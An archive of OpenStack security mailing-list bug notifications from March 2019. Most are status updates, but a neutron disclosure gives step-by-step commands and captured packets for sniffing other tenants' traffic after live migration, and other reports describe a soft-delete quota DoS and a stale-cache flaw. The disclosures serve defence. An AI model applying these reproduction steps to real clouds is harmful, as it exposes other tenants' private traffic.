From 1816836 at bugs.launchpad.net Fri Mar 1 00:05:53 2019 From: 1816836 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 01 Mar 2019 00:05:53 -0000 Subject: [Openstack-security] [Bug 1816836] Re: manila's devstack plugin fails with tls_proxy enabled References: <155068881794.22969.12262308667168798263.malonedeb@wampee.canonical.com> Message-ID: <155139875337.32254.1698386768668046227.malone@wampee.canonical.com> Reviewed: https://review.openstack.org/638320 Committed: https://git.openstack.org/cgit/openstack/manila/commit/?id=8f1c7dc91fb1e00784f6228526d95f4434ba8a01 Submitter: Zuul Branch: master commit 8f1c7dc91fb1e00784f6228526d95f4434ba8a01 Author: Goutham Pacha Ravi Date: Wed Feb 20 18:00:45 2019 -0800 Fix tls-proxy issues with the devstack plugin Enabling tls-proxy allows devstack to set up a tls proxy server that front-ends interactions with the manila-api and terminates tls connections. Also enable tls-proxy in dummy and lvm jobs. The dummy driver job is configured to run the in-built wsgi server, the lvm job is configured to use mod-wsgi. Closes-Bug: #1816836 Change-Id: I48b0ccc082604d78242ba61bee94a45efeb2467b ** Changed in: manila Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816836 Title: manila's devstack plugin fails with tls_proxy enabled Status in Manila: Fix Released Bug description: This bug was exposed in https://review.openstack.org/#/c/625191/ (Relevant log files have been attached to this bug report). Manila's devstack plugin sets the listen port to 18786 when tls_proxy has been enabled on devstack, but performs a health check on the API service on the default/non-tls port (8786) [2]. This check causes devstack to fail. [1] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L280 [2] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L830 To manage notifications about this bug go to: https://bugs.launchpad.net/manila/+bug/1816836/+subscriptions From 1816836 at bugs.launchpad.net Fri Mar 1 00:29:16 2019 From: 1816836 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 01 Mar 2019 00:29:16 -0000 Subject: [Openstack-security] [Bug 1816836] Fix proposed to manila (stable/rocky) References: <155068881794.22969.12262308667168798263.malonedeb@wampee.canonical.com> Message-ID: <155140015701.18604.18214609142231656115.malone@gac.canonical.com> Fix proposed to branch: stable/rocky Review: https://review.openstack.org/640230 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816836 Title: manila's devstack plugin fails with tls_proxy enabled Status in Manila: Fix Released Bug description: This bug was exposed in https://review.openstack.org/#/c/625191/ (Relevant log files have been attached to this bug report). Manila's devstack plugin sets the listen port to 18786 when tls_proxy has been enabled on devstack, but performs a health check on the API service on the default/non-tls port (8786) [2]. This check causes devstack to fail. [1] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L280 [2] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L830 To manage notifications about this bug go to: https://bugs.launchpad.net/manila/+bug/1816836/+subscriptions From 1816836 at bugs.launchpad.net Fri Mar 1 00:30:01 2019 From: 1816836 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 01 Mar 2019 00:30:01 -0000 Subject: [Openstack-security] [Bug 1816836] Change abandoned on manila (stable/rocky) References: <155068881794.22969.12262308667168798263.malonedeb@wampee.canonical.com> Message-ID: <155140020111.17116.6051341137410526075.malone@soybean.canonical.com> Change abandoned by Goutham Pacha Ravi (gouthampravi at gmail.com) on branch: stable/rocky Review: https://review.openstack.org/640230 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816836 Title: manila's devstack plugin fails with tls_proxy enabled Status in Manila: Fix Released Bug description: This bug was exposed in https://review.openstack.org/#/c/625191/ (Relevant log files have been attached to this bug report). Manila's devstack plugin sets the listen port to 18786 when tls_proxy has been enabled on devstack, but performs a health check on the API service on the default/non-tls port (8786) [2]. This check causes devstack to fail. [1] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L280 [2] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L830 To manage notifications about this bug go to: https://bugs.launchpad.net/manila/+bug/1816836/+subscriptions From 1734320 at bugs.launchpad.net Fri Mar 1 04:54:26 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 01 Mar 2019 04:54:26 -0000 Subject: [Openstack-security] [Bug 1734320] Fix proposed to neutron (master) References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <155141606659.28693.6732345715650983669.malone@chaenomeles.canonical.com> Fix proposed to branch: master Review: https://review.openstack.org/640258 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1501808 at bugs.launchpad.net Tue Mar 12 13:20:06 2019 From: 1501808 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 12 Mar 2019 13:20:06 -0000 Subject: [Openstack-security] [Bug 1501808] Change abandoned on nova (master) References: <20151001152652.22834.78736.malonedeb@gac.canonical.com> Message-ID: <155239680671.1787.10494296282895724732.malone@wampee.canonical.com> Change abandoned by Matt Riedemann (mriedem.os at gmail.com) on branch: master Review: https://review.openstack.org/407877 Reason: Duplicate of https://review.openstack.org/#/c/386756/ which was abandoned and I'm going to abandon this also - as noted in that other review, this would be a change in behavior and requires wider discussion. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1501808 Title: Enabling soft-deletes opens a DOS on compute hosts Status in OpenStack Compute (nova): Opinion Status in OpenStack Security Advisory: Won't Fix Bug description: If the user sets reclaim_instance_interval to anything other than 0, then when a user requests an instance delete, it will instead be soft deleted. Soft delete explicitly releases the user's quota, but does not release the instance's resources until period task _reclaim_queued_deletes runs with a period of reclaim_instance_interval seconds. A malicious authenticated user can repeatedly create and delete instances without limit, which will consume resources on the host without consuming their quota. If done quickly enough, this will exhaust host resources. I'm not entirely sure what to suggest in remediation, as this seems to be a deliberate design. The most obvious fix would be to not release quota until the instance is reaped, but that would be a significant change in behaviour. This is very similar to https://bugs.launchpad.net/bugs/cve/2015-3280 , except that we do it deliberately. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1501808/+subscriptions From morgan.fainberg at gmail.com Wed Mar 13 18:43:03 2019 From: morgan.fainberg at gmail.com (Morgan Fainberg) Date: Wed, 13 Mar 2019 18:43:03 -0000 Subject: [Openstack-security] [Bug 1819957] [NEW] Caching with stale data when a server disconnects due to network partition and reconnects Message-ID: <155250258380.27992.5839797432076968036.malonedeb@wampee.canonical.com> *** This bug is a security vulnerability *** Public security bug reported: The flush_on_reconnect optional flag is not used. This can cause stale data to be utilized from a cache server that disconnected due to a network partition. This has security concerns as follows: 1* Password changes/user changes may be reverted for the cache TTL 1a* User may get locked out if PCI-DSS is on and the password change happens during the network partition. 2* Grant changes may be reverted for the cache TTL 3* Resources (all types) may become "undeleted" for the cache TTL 4* Tokens (KSM) may become valid again during the cache TTL As noted in the python-memcached library: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. The solution is to explicitly pass flush_on_reconnect as an optional argument. A concern with this model is that the memcached servers may be utilized by other tooling and may lose cache state (in the case the oslo.cache connection is the only thing affected by the network partitioning). This similarly needs to be addressed in pymemcache when it is utilized in lieu of python-memcached. ** Affects: keystone Importance: High Assignee: Morgan Fainberg (mdrnstm) Status: New ** Affects: keystonemiddleware Importance: High Assignee: Morgan Fainberg (mdrnstm) Status: New ** Affects: oslo.cache Importance: High Assignee: Morgan Fainberg (mdrnstm) Status: New ** Tags: caching security ** Also affects: keystonemiddleware Importance: Undecided Status: New ** Also affects: oslo.cache Importance: Undecided Status: New ** Tags added: caching security ** Changed in: keystone Importance: Undecided => High ** Changed in: keystonemiddleware Importance: Undecided => High ** Changed in: oslo.cache Importance: Undecided => High ** Changed in: keystone Assignee: (unassigned) => Morgan Fainberg (mdrnstm) ** Changed in: keystonemiddleware Assignee: (unassigned) => Morgan Fainberg (mdrnstm) ** Changed in: oslo.cache Assignee: (unassigned) => Morgan Fainberg (mdrnstm) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1819957 Title: Caching with stale data when a server disconnects due to network partition and reconnects Status in OpenStack Identity (keystone): New Status in keystonemiddleware: New Status in oslo.cache: New Bug description: The flush_on_reconnect optional flag is not used. This can cause stale data to be utilized from a cache server that disconnected due to a network partition. This has security concerns as follows: 1* Password changes/user changes may be reverted for the cache TTL 1a* User may get locked out if PCI-DSS is on and the password change happens during the network partition. 2* Grant changes may be reverted for the cache TTL 3* Resources (all types) may become "undeleted" for the cache TTL 4* Tokens (KSM) may become valid again during the cache TTL As noted in the python-memcached library: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. The solution is to explicitly pass flush_on_reconnect as an optional argument. A concern with this model is that the memcached servers may be utilized by other tooling and may lose cache state (in the case the oslo.cache connection is the only thing affected by the network partitioning). This similarly needs to be addressed in pymemcache when it is utilized in lieu of python-memcached. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1819957/+subscriptions From 1816836 at bugs.launchpad.net Tue Mar 19 11:17:28 2019 From: 1816836 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 19 Mar 2019 11:17:28 -0000 Subject: [Openstack-security] [Bug 1816836] Re: manila's devstack plugin fails with tls_proxy enabled References: <155068881794.22969.12262308667168798263.malonedeb@wampee.canonical.com> Message-ID: <155299424904.17795.10892930458869013749.malone@gac.canonical.com> Reviewed: https://review.openstack.org/640230 Committed: https://git.openstack.org/cgit/openstack/manila/commit/?id=edc60f76c2818351f8a6d1090a5549970b1891cc Submitter: Zuul Branch: stable/rocky commit edc60f76c2818351f8a6d1090a5549970b1891cc Author: Goutham Pacha Ravi Date: Wed Feb 20 18:00:45 2019 -0800 Fix tls-proxy issues with the devstack plugin Enabling tls-proxy allows devstack to set up a tls proxy server that front-ends interactions with the manila-api and terminates tls connections. Also enable tls-proxy in dummy and lvm jobs. The dummy driver job is configured to run the in-built wsgi server, the lvm job is configured to use mod-wsgi. Closes-Bug: #1816836 Change-Id: I48b0ccc082604d78242ba61bee94a45efeb2467b (cherry picked from commit 8f1c7dc91fb1e00784f6228526d95f4434ba8a01) ** Tags added: in-stable-rocky -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816836 Title: manila's devstack plugin fails with tls_proxy enabled Status in Manila: Fix Released Bug description: This bug was exposed in https://review.openstack.org/#/c/625191/ (Relevant log files have been attached to this bug report). Manila's devstack plugin sets the listen port to 18786 when tls_proxy has been enabled on devstack, but performs a health check on the API service on the default/non-tls port (8786) [2]. This check causes devstack to fail. [1] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L280 [2] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L830 To manage notifications about this bug go to: https://bugs.launchpad.net/manila/+bug/1816836/+subscriptions From fungi at yuggoth.org Tue Mar 19 13:33:10 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 19 Mar 2019 13:33:10 -0000 Subject: [Openstack-security] [Bug 1819957] Re: Caching with stale data when a server disconnects due to network partition and reconnects References: <155250258380.27992.5839797432076968036.malonedeb@wampee.canonical.com> Message-ID: <155300239070.17831.8394393647031253010.malone@gac.canonical.com> Unless there's a way for a malicious actor to trigger and take advantage of this condition, this is probably a class D (security hardening opportunity) report: https://security.openstack.org/vmt-process.html #incident-report-taxonomy ** Also affects: ossa Importance: Undecided Status: New ** Changed in: ossa Status: New => Won't Fix ** Information type changed from Public Security to Public -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1819957 Title: Caching with stale data when a server disconnects due to network partition and reconnects Status in OpenStack Identity (keystone): Triaged Status in keystonemiddleware: Triaged Status in oslo.cache: New Status in OpenStack Security Advisory: Won't Fix Bug description: The flush_on_reconnect optional flag is not used. This can cause stale data to be utilized from a cache server that disconnected due to a network partition. This has security concerns as follows: 1* Password changes/user changes may be reverted for the cache TTL 1a* User may get locked out if PCI-DSS is on and the password change happens during the network partition. 2* Grant changes may be reverted for the cache TTL 3* Resources (all types) may become "undeleted" for the cache TTL 4* Tokens (KSM) may become valid again during the cache TTL As noted in the python-memcached library: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. The solution is to explicitly pass flush_on_reconnect as an optional argument. A concern with this model is that the memcached servers may be utilized by other tooling and may lose cache state (in the case the oslo.cache connection is the only thing affected by the network partitioning). This similarly needs to be addressed in pymemcache when it is utilized in lieu of python-memcached. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1819957/+subscriptions From 1819957 at bugs.launchpad.net Wed Mar 20 06:25:54 2019 From: 1819957 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 20 Mar 2019 06:25:54 -0000 Subject: [Openstack-security] [Bug 1819957] Re: Caching with stale data when a server disconnects due to network partition and reconnects References: <155250258380.27992.5839797432076968036.malonedeb@wampee.canonical.com> Message-ID: <155306315427.9880.14621491657038385982.malone@wampee.canonical.com> Fix proposed to branch: master Review: https://review.openstack.org/644774 ** Changed in: oslo.cache Status: New => In Progress -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1819957 Title: Caching with stale data when a server disconnects due to network partition and reconnects Status in OpenStack Identity (keystone): Triaged Status in keystonemiddleware: Triaged Status in oslo.cache: In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: The flush_on_reconnect optional flag is not used. This can cause stale data to be utilized from a cache server that disconnected due to a network partition. This has security concerns as follows: 1* Password changes/user changes may be reverted for the cache TTL 1a* User may get locked out if PCI-DSS is on and the password change happens during the network partition. 2* Grant changes may be reverted for the cache TTL 3* Resources (all types) may become "undeleted" for the cache TTL 4* Tokens (KSM) may become valid again during the cache TTL As noted in the python-memcached library: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. The solution is to explicitly pass flush_on_reconnect as an optional argument. A concern with this model is that the memcached servers may be utilized by other tooling and may lose cache state (in the case the oslo.cache connection is the only thing affected by the network partitioning). This similarly needs to be addressed in pymemcache when it is utilized in lieu of python-memcached. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1819957/+subscriptions From fungi at yuggoth.org Wed Mar 20 18:27:39 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 20 Mar 2019 18:27:39 -0000 Subject: [Openstack-security] =?utf-8?q?=5BBug_1816727=5D_Re=3A_nova-novnc?= =?utf-8?q?proxy_does_not_handle_TCP_RST_cleanly_when_using_SSL=C2=A0?= References: <155065649227.28374.17032096910895521610.malonedeb@chaenomeles.canonical.com> Message-ID: <155310646017.32205.3634730266513708251.malone@soybean.canonical.com> Given lack of objections and Melanie's assertion in comment #10 that this doesn't seem to be a vulnerability in websockify itself nor is the condition which is caused by a potential attacker sending TCP/RST packets immediately after an SSL handshake necessarily any more problematic than repeatedly opening SSL connections and dropping them silently without closing, I'm triaging this as a class D (security hardening opportunity) report and switching it to a normal public bug. Please feel free to continue with patch deliberations in normal public code reviews. ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - Description =========== We have nova-novncproxy configured to use SSL: ``` [DEFAULT] ssl_only=true cert = /etc/nova/ssl/certs/signing_cert.pem key = /etc/nova/ssl/private/signing_key.pem ... [vnc] enabled = True server_listen = "0.0.0.0" server_proxyclient_address = 192.168.237.81 novncproxy_host = 192.168.237.81 novncproxy_port = 5554 novncproxy_base_url = https://:6080/vnc_auto.html xvpvncproxy_host = 192.168.237.81 ``` We also have haproxy acting as a load balancer, but not terminating SSL. We have an haproxy health check configured like this for nova- novncproxy: ``` listen nova-novncproxy     # irrelevant config...     server 192.168.237.84:5554 check check-ssl verify none inter 2000 rise 5 fall 2 ``` where 192.168.237.81 is a virtual IP address and 192.168.237.84 is the node's individual IP address. With that health check enabled, we found the nova-novncproxy process CPU spiking and eventually causing the node to hang. With debug logging enabled, we noticed this in the nova-novncproxy logs: 2019-02-19 15:02:44.148 2880 INFO nova.console.websocketproxy [-] WebSocket server settings: 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Listen on 192.168.237.81:5554 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Flash security policy server 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Web server (no directory listings). Web root: /usr/share/novnc 2019-02-19 15:02:44.150 2880 INFO nova.console.websocketproxy [-] - SSL/TLS support 2019-02-19 15:02:44.151 2880 INFO nova.console.websocketproxy [-] - proxying from 192.168.237.81:5554 to None:None 2019-02-19 15:02:45.015 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.184 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.377 2889 DEBUG nova.context [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Found 2 cells: 00000000-0000-0000-0000-000000000000(cell0),9f9825dd-868f-41cc-9c8e-e544f1528d6a(cell1) load_cells /usr/lib/python2.7/site-packages/nova/context.py:479 2019-02-19 15:02:45.380 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.382 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.002s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.393 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 